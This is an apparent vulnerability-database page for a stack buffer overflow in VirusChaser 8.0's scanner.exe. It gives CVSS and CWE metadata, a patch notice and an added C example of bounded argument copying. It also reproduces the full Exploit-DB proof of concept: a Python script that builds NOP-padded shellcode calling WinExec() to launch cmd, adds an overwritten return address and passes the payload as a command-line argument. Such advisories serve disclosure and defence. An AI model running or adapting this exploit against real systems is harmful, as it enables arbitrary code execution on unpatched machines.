Vendor: VirusChaser 8.0
By: wh1ant
CVSS: 9.3 (HIGH)
Type: Stack Buffer Overflow
CWE: 119
Product Name: VirusChaser 8.0
Affected Version From: 8.0
Affected Version To: 8.0
Patch Exists: YES
Related CWE: N/A
CPE: a:viruschaser:viruschaser:8.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
Year: 2014

VirusChaser 8.0 – Stack Buffer Overflow

VirusChaser 8.0 is vulnerable to a stack buffer overflow. An attacker can exploit it by passing a specially crafted payload as the command-line argument to scanner.exe. The payload contains shellcode that runs when the application processes the malicious input. The shellcode calls the WinExec() function, which can be used to execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of VirusChaser 8.0.
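
The general fix for this bug class, shown as an added example (not the vendor's patch and not code from the original page): an untrusted command-line argument is length-checked before it is copied into a fixed-size buffer, and oversized input is rejected rather than truncated. The names copy_scan_path and SCAN_PATH_MAX and the 260-byte limit are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define SCAN_PATH_MAX 260  /* assumed limit (Windows MAX_PATH), not from the vendor */
enum copy_status { COPY_OK = 0, COPY_BAD_ARG = -1, COPY_TOO_LONG = -2 };

/* Length of s, reading at most max bytes. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/*
 * Copy an untrusted argument into a fixed-size buffer. The unsafe pattern
 * for CWE-119 is an unbounded strcpy() of argv[1] into a stack array.
 * Oversized input is refused and dst is left as an empty string.
 */
int copy_scan_path(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || dst_size == 0 || src == NULL)
        return COPY_BAD_ARG;
    dst[0] = '\0';
    size_t len = bounded_len(src, dst_size);
    if (len >= dst_size)            /* no room for the terminating NUL */
        return COPY_TOO_LONG;
    memcpy(dst, src, len + 1);      /* len + 1 <= dst_size, includes NUL */
    return COPY_OK;
}

/* Constructed input: 523 filler bytes, the argument length the script on this page builds. */
int demo_oversized_is_rejected(void)
{
    char arg[524];
    char path[SCAN_PATH_MAX];
    memset(arg, 'A', 523);
    arg[523] = '\0';
    return copy_scan_path(path, sizeof path, arg) == COPY_TOO_LONG && path[0] == '\0';
}

int main(int argc, char **argv)
{
    char path[SCAN_PATH_MAX];
    if (argc < 2 || copy_scan_path(path, sizeof path, argv[1]) != COPY_OK)
        return 1;                   /* refuse to scan rather than overflow */
    return 0;
}
```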

Exploit-DB raw data:

# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow
# Date: 2014/03/26
# Exploit Author: wh1ant
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Version: 8.0
# Tested on: Windows 7 ultimate K
#
# You must have administrator permission to run

from struct import pack
import os

shellcode = "\x66\x83\xc4\x10"        # add sp, 0x10 (0x66 operand-size prefix)
shellcode += "\xb8\x50\x70\x50\x50"   # mov eax, 0x50507050
shellcode += "\xb9\x4e\x7d\x04\x27"   # mov ecx, 0x27047d4e
shellcode += "\x03\xc1"               # add eax, ecx  ; WinExec() address
shellcode += "\x68\x63\x6d\x64\x01"   # push 0x01646D63
shellcode += "\x66\xb9\x50\x50"       # mov cx, 0x5050
shellcode += "\x66\x81\xc1\xb0\xaf"   # add cx, 0xafb0
shellcode += "\x88\x4c\x24\x03"       # mov [esp+3], cl
shellcode += "\x8b\xd4"               # mov edx, esp
shellcode += "\x66\x51"               # push cx
shellcode += "\x41"                   # inc ecx
shellcode += "\x66\x51"               # push cx
shellcode += "\x52"                   # push edx
shellcode += "\x50"                   # push eax
shellcode += "\x50"                   # push eax
shellcode += "\xc3\x90"               # retn  ; WinExec()

# BOF retn: 0x0040753d

pay = shellcode
pay = pay.rjust(520, "\x90")
pay += "\x9c\xdb\x12"

os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"")